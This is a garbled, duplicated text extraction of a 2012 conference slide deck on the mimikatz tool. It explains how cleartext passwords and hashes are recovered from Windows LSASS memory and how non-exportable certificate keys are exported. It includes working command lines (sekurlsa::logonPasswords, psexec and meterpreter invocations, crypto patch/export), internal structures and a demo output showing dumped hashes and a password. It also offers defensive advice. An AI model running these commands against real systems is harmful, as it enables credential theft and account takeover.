07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz sekurlsa wdigest theory
mimikatz sekurlsa wdigest theory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigest workflow
mimikatz sekurlsa wdigest workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flink struct _KIWI_WDIGEST_LIST_ENTRY Blink DWORD UsageCount struct _KIWI_WDIGEST_LIST_ENTRY This LUID LocallyUniqueIdentifier [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password [hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LKIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigest demo time
mimikatz sekurlsa wdigest demo time
sekurlsawdigest
sekurlsawdigest
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21 21
mimikatz sekurlsa livessp mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
because Microsoft was too good in closed networks
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22 22
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23 23
0 kdgt process 0 0 lsassexe PROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4 DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not Accessiblegt Image lsassexe 0 kdgt process i 83569040 You need to continue execution (press g ltentergt) for the context to be switched When the debugger breaks in again you will be in the new process context 0 kdgt g Break instruction exception - code 80000003 (first chance) ntRtlpBreakWithStatusInstruction 814b39d0 cc int 3 0 kdgt reload user Loading User Symbols 0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g 0 kdgt g
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24 24
lsasrvLsaProtectMemory livesspLiveMakeSupplementalCred livesspLiveMakeSecPkgCredentials livesspLsaApLogonUserEx2 livesspSpiLogonUserEx2 lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2 livesspLsaApLogonUserEx2 (74781536) [] livesspLsaApLogonUserEx2+0x560 (74781a96) call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livessp workflow
mimikatz sekurlsa livessp workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flink struct _KIWI_LIVESSP_LIST_ENTRY Blink PVOID unk0 PVOID unk1 PVOID unk2 PVOID unk3 DWORD unk4 DWORD unk5 PVOID unk6 LUID LocallyUniqueIdentifier LSA_UNICODE_STRING UserName PVOID unk7 PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LISKIWI_LIVESSP_LIST_ENTRY KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSupp DWORD unk0 LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26 26
Me yes
mimikatz sekurlsa kerberos mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27 27
lsasrvLsaProtectMemory kerberosKerbHideKey kerberosKerbCreatePrimaryCredentials kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory kerberosKerbHidePassword kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory wdigestSpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6) workflow
mimikatz sekurlsa kerberos (nt6) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL DWORD unk0 PVOID unk1 PVOID unk2 PVOID unk3 ifdef _M_X64 BYTE unk4[32] elif defined _M_IX86 BYTE unk4[20] endif LUID LocallyUniqueIdentifier ifdef _M_X64 BYTE unk5[44] elif defined _M_IX86 BYTE unk5[36] endif LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5) workflow
mimikatz sekurlsa kerberos (nt5) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flink struct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCount PVOID unk0 PVOID unk1 PVOID unk2 DWORD unk3 DWORD unk4 PVOID unk5 PVOID unk6 PVOID unk7 LUID LocallyUniqueIdentifier
ifdef _M_IX86 DWORD unk8
endif DWORD unk9 DWORD unk10 PVOID unk11 DWORD unk12 DWORD unk13 PVOID unk14 PVOID unk15 PVOID unk16 [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa demo time
mimikatz sekurlsa demo time
Final sekurlsa demo sekurlsalogonPasswords full
Final sekurlsa demo sekurlsalogonPasswords full
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30 30
mimikatz sekurlsa kerberos ldquohu rdquo
mimikatz sekurlsa kerberos ldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31 31
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
